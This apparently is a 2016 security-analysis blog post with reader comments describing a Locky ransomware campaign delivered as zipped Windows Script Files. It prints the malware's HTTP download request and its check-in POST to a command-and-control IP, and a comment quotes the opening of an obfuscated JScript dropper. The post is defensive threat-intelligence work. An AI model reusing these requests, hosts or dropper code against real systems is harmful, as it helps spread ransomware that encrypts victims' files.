Pretty much all the Locky variants I have looked at the last couple days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isn't all that different. "Windows Script" is essentially JavaScript. The only difference is the Today's subject for the e-mail was "Transaction details". Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware. GET /2tn0o HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: onlybest76.xyz Connection: Keep-Alive Just like earlier versions, it then "registers" the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it: POST /data/info.php HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://95.85.19.195/data/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 95.85.19.195 Content-Length: 942 Connection: Keep-Alive [post data omitted] Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with packet capture, mail server logs, and the malware sample here (password: "blind chicken" ). Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.
--- |
Johannes 4506 Posts ISC Handler Aug 30th 2016 |
Thread locked Subscribe |
Aug 30th 2016 5 years ago |
Also using HTA files today & on other odd occasions recently https://myonlinesecurity.co.uk/sent-with-genius-scan-for-ios-pretending-to-come-from-your-own-email-address-leads-to-locky-ransomware/
|
DVK01 21 Posts |
Quote |
Aug 31st 2016 5 years ago |
Greetings:
I'm pretty sure I just got some malware in the form of a ZIP file containing a .wsf file (XML text). It's a bit long to paste. First few lines: <?xml?> <package> <job id='oevPEW'><script language='JScript'></script><script language='JScript'><![CDATA[ String.prototype.toshibasatelliteLAMODAtiiiyamooo = function() { If this is of any interest, let me know the best way to get it to you. I'm on an Air Force base, so I may not be able to use methods that work for everyone else. Thanks. -- Karl Vogel vogelke+isc@pobox.com |
kvogel 1 Posts |
Quote |
Sep 6th 2016 5 years ago |
you can upload file via our contact form isc.sans.edu/…
|
Johannes 4506 Posts ISC Handler |
Quote |
Sep 6th 2016 5 years ago |
Sign Up for Free or Log In to start participating in the conversation!